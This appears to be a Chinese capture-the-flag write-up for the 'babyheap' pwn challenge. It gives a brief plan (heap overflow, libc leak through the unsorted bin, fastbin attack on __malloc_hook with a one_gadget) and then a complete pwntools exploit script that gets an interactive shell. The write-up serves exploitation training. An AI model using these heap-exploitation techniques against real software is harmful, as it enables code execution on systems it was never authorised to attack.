这道题分配内存空间是用calloc释放之后会清空分配的内容
edit函数存在堆溢出我们由打赢函数指针数组存在satck地址随机,我们先想到的fastbin attack写onegadget但是要先有libc基址也是先是information
leak然后contorl pc我们就可以
先分配4个
add(0x10) #0
add(0x10) #1
add(0x80) #2
add(0x10) #3
修改第二个chunk的size为0x30,然后包含了第三个chunk的fd和bk,伪造一个chunk到第三个chunk的数据内,然后释放释放第二个chunk,然后再次申请同样的chunk,之后释放第三个chunk得到libc地址打印第二个chunk即可得到libc地址,然后再次申请一个fastbin大小的chunk修改其fd,即可任意地址写入(注意要将堆块复原因为calloc)
exp:
#!/usr/bin/python2
#coding=utf-8
#name:doudou
from pwn import *
local=1
if local==1:
p=process('../binary/0babyheap')
elf=ELF('../binary/0babyheap')
libc=elf.libc
else:
p=remote('node3.buuoj.cn',25561)
elf=ELF('../binary/0babyheap')
libc=elf.libc
onegadget=[0x45216,0x4526a,0xf02a4,0xf1147]
def add(size):
p.sendlineafter('Command: ','1')
p.sendlineafter('Size: ',str(size))
def edit(idx,size,content):
p.sendlineafter('Command: ','2')
p.sendlineafter('Index: ',str(idx))
p.sendlineafter('Size: ',str(size))
p.sendlineafter('Content: ',content)
def delete(idx):
p.sendlineafter('Command: ','3')
p.sendlineafter('Index: ',str(idx))
def show(idx):
p.sendlineafter('Command: ','4')
p.sendlineafter('Index: ',str(idx))
def exp():
add(0x10) #0
add(0x10) #1
add(0x80) #2
add(0x10) #3
payload='\x00'*0x18+p64(0x41)
edit(0,len(payload),payload)
pd='\x00'*0x18+p64(0x71)
edit(2,len(pd),pd)
delete(1)
add(0x30) #1
edit(1,0x20,'\x00'*0x18+p64(0x91)) #calloc
delete(2)
#edit(1,0x20,'a'*0x20)
show(1)
libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-88-0x10-libc.sym['__malloc_hook']
log.success('libcbase: '+hex(libcbase))
malloc_hook=libcbase+libc.sym['__malloc_hook']
one_gadget=libcbase+onegadget[1]
log.success('One_gadge: '+hex(one_gadget))
add(0x60)#3
delete(2)
pd2='a'*0x18+p64(0x71)+p64(malloc_hook-0x23)
edit(1,len(pd2),pd2)
add(0x60) #3
add(0x60) #4
payload='a'*19+p64(one_gadget)
edit(4,len(payload),payload)
show(1)
p.interactive()
if __name__=="__main__":
exp()